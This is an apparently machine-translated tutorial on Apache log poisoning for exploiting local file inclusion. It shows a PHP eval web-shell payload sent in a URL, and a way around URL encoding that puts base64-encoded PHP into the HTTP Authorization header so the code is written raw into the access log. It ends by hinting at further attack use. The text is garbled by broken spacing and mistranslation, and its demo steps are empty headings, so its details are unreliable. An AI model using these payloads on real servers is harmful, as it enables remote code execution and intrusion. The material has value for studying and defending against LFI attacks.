Apache Log bypass URL encoding method

Scenario: when we have LFI vul, the most common use is to construct malicious logs to exploit the vulnerability. Some problems may occur in this process. The following describes the problems and solutions.
Topic: Apache Log bypass URL encoding method
First, briefly introduce Apache logs. Apache logs are stored in the logs folder under the installation directory by default, mainly including access logs and error logs. In Windows, these two log files are access. log and error. log. in Linux, they are access_log and error_log.
(Note: I have set up a test environment on a local virtual machine with the IP address 192.168.5.66)
Access. log/access_log records all access activities to the Web server. The format is as follows:

192.168.5. 66--[21/Apr/2014: 10: 21: 04 + 0800] "GET/test. php? Id = 1 HTTP/1.1 "200 2876


1. remote Host, 2. blank (E-mail), 3. blank (login name), 4. request time, 5. method + resource + protocol, 6. status Code, 7. sent bytes
Based on this feature, we can construct a malicious access record. The payload is as follows:


Http: // 192.168.5. 66/test. php? Id = <? Php eval ($ _ POST [test]);?>


Enter the preceding address in the browser to access the log to survive a record:

192.168.5. 66--[21/Apr/2014: 11: 21: 04 + 0800] "GET/test. php? Id = % 3C? Php % 20 eval ($ _ POST [test]);? % 3E https/1.1 "200 2956


In this log
Id = % 3C? Php % 20 eval ($ _ POST [test]);? % 3E
 


This Code corresponds
Id = <? Php eval ($ _ POST [test]);?>


Visible characters '<', '', and '<' Are URL encoded as '% 3C', '% 20', and' % 3E '. Therefore, we need to bypass the URL encoding to write the correct PHP code into the log.
How URL encoding is bypassed:
The Authorization field in the http header is used to send information for http auth authentication. The value format is "Basic base64 (User: Pass )". Accordingly, we re-construct the payload as follows:
URL: http: // 192.168.5.115/test. php
Add Authorization = Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY = to HTTP HEAD
Note: PD9waHAgcGhwaW5mbygpPz46MTIzNTY = is base64 (<? Php phpinfo ()?> : 12356)
This method can be used to successfully bypass URL encoding and write the correct PHP code into the log as follows:
192.168.5.115-<? Php phpinfo ()?> [21/Apr/2014: 11: 21: 04 + 0800] "GET/test. php HTTP/1.1" 200 2735



Demo:
Visit the website root directory:

View access logs:

Add the Authorization field of the http header:







Check the access log to determine whether the Authorization field value is successfully written.Log in

In this way, the PHP code can be successfully written into the Apache log by bypassing URL encoding. As for the attack method after the PHP code is successfully written, we will not describe it here. You know, hey.